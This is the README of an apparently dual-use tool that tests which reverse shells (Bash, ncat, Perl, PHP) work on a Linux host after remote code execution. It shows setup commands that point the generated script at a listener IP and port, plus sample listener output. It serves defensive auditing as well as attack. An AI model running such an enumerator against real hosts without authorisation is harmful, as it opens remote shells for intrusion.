Reverse Shell Enumeration

Why?

You're a defender wanting to audit to see which reverse shells work out of the box on a particular host. Or, you're a lazy attacker wanting to quickly determine which reverse shells will work.

When?

You have remote code execution on a Linux host, and the noise this enumeration generates is not an operational concern.

How?

1. Clone the repo:

git clone https://github.com/fx2301/reverseshellenum.git
cd reverseshellenum

1. Generate yourself a fresh script:

LHOST="10.10.0.123" LPORT=31373 python3 generate.py

1. Run the listener:

./listen.sh

1. Run the reverse shell enumerator on the target host:

./reverseshellenum.sh

1. Observe which shells work (refer to shells.json):

$ ./listen.sh
[i] Starting Reverse Shell Audit
  [+] Success: Bash -i
  [+] Success: Bash 196
  [+] Success: Bash read line
  [+] Success: Bash 5
  [+] Success: ncat -e
  [+] Success: Perl
  [+] Success: Perl no sh
  [+] Success: PHP Emoji
[i] Ending Reverse Shell Audit

PR's welcome! Kudos to revshells.com for the raw material.